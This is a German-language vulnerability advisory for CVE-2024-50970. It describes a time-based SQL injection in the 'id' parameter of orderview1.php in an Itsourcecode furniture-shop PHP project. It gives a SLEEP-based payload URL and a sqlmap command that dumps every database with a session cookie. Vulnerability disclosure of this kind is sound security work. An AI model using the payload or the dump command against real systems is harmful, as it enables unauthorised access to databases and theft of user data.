CVE-2024-50970
Beschreibung
Eine SQL-Injection-Schwachstelle in der Datei orderview1.php des Itsourcecode Online Furniture Shopping Project 1.0 ermöglicht es entfernten Angreifern, beliebige SQL-Befehle über den Parameter id auszuführen.
Schwachstellentyp
SQL-Injection
Anbieter des Produkts
Itsourcecode
Betroffene Produktcodebasis:
https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0
Betroffene Komponente:
Das Itsourcecode Online Furniture Shopping v1.0 ist anfällig für SQL-Injection über den Parameter id in der Seite orderview1.php
Angriffsvektoren:
- Richten Sie die Anwendung lokal ein, registrieren Sie ein Konto und melden Sie sich mit dem neu registrierten Konto an.
- Navigieren Sie in Ihrem Browser zu folgender URL:
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
- SQL-Payload injizieren:
Ändern Sie den Parameter id in der URL, um eine zeitbasierte SQL-Injection-Payload einzufügen.
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
- Beobachten Sie die Antwort der Anwendung:
Die Seite sollte merklich länger (10 Sekunden) zum Laden benötigen, wenn die Injection erfolgreich ist, was bestätigt, dass der Parameter id anfällig für SQL-Injection ist.
- Verwenden Sie nun das SQLMap-Tool zur weiteren Ausnutzung und zum Auslesen der Datenbanken mit dem folgenden Befehl:
python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
Referenzen:
- https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
- https://owasp.org/www-community/attacks/SQL_Injection